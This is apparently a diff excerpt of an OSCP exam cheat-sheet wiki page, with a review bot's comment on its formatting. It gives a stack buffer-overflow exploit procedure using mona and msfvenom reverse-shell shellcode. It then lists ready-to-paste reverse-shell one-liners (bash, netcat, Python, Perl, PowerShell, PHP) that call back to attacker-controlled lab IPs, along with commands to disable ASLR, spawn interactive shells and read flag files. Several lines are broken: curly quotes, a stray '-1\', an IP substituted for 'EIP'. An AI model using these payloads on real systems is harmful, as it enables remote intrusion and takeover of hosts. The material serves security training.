 +badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 
 +with script _badchars.py and  
 +"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin" 
 + 5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/): 
 + a. !mona config -set workingfolder c:\logs\%p 
 +     b. !mona bytearray -b "\x00\x0d" 
 +     c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again 
 +     d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address) 
 +     e. In " data", before unicode chars it shows badchars. 
 + 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE" 
 +  
 + 6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE" 
 + 6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f 
 + 
 + 
 +7. Generate shellcode and place it: 
 +msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00" 
 + 
 +msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode 
 + 
 +8. Final buffer like: 
 +buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" 8 + shellcode 
 +</code> 
 + 
 + 
 +** Reverse Shells ** 
 +<code> 
 +# Linux  
 +bash -i >& /dev/tcp/10.11.1.111/4443 0>&1 
 +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.111 4443 >/tmp/f 
 +nc -e /bin/sh 10.11.1.111 4443 
 + 
 +# Python 
 +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 
 + 
 +__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\ 
 + 
 +# Perl 
 +perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 
 + 
 +# Windows 
 +nc -e cmd.exe 10.11.1.111 4443 
 +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 
 + 
 +# PHP most simple Linux 
 +<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?> 
 +</code> 
 + 
 + 
 + 
 + 
 +**Disable ASLR on linux machine** 
 +<code> 
 +echo 0 > /proc/sys/kernel/randomize_va_space 
 +</code> 
 + 
 + 
 + 
 + 
 +**Get full shell on jail shelle** 
 +<code> 
 +python -c “import pty;pty.spawn(‘/bin/sh’);”  
 +echo ‘os.system(‘/bin/bash’)’ 
 +perl -e ‘exec “/bin/sh”;’ 
 +</code> 
 + 
 + 
 + 
 + 
 +** Find and locate the flags  ** 
 +<code> 
 +#Linux: 
 +echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " " 
 +find / -name "network-secret.txt" 
 +locate "network-secret.txt" 
 + 
 +#Windows: 
 +echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul 
 +dir /s /b network-secret.txt 
 +</code> 
 + 
 + 
 +**Note template** 
 +<code>
 To work fast use CherryTree to take notes and use this template : To work fast use CherryTree to take notes and use this template :
 https://ceso.github.io/files/oscp/template_pwk.ctb https://ceso.github.io/files/oscp/template_pwk.ctb
 +</code>
  
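Review bot: `&lt;code&gt` in the `**Cookies error padding:**` section is an HTML-escaped, unterminated tag, so the block does not render as code and the `</code>` that follows is unmatched; replace it with a literal `<code>`. Other breakage in this region: `(E10.11.1.111 offset)` in BOF step 3 is `(EIP offset)` with `IP` caught by a find-and-replace to `10.11.1.111`; `–e x86/shikata_ga_nai` in step 7 uses an en-dash; `/usr/share/wordlistsnmap.lst` is missing the `/` before `nmap.lst` in three hydra lines; the `python -c “import pty;pty.spawn(‘/bin/sh’);”`, `echo ‘os.system(‘/bin/bash’)’` and `perl -e ‘exec “/bin/sh”;’` lines use curly quotes that the shell will not treat as quotes; `jail shelle` is a typo, and the `__import__('os').system(...)-1\` line carries a stray trailing `-1\`. `**Disable ASLR on linux machine**` writes `0` to `/proc/sys/kernel/randomize_va_space`, which is a lab-only setting for reproducing a crash under a debugger and should say so; `Note template` wraps prose and a link in `<code>`. The Kerberos block removed here is the one that reappears under Port 88 with every line duplicated.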
oscp_survival_guide.1612641391.txt.gz · Last modified: 2021/02/06 20:56 by M0N5T3R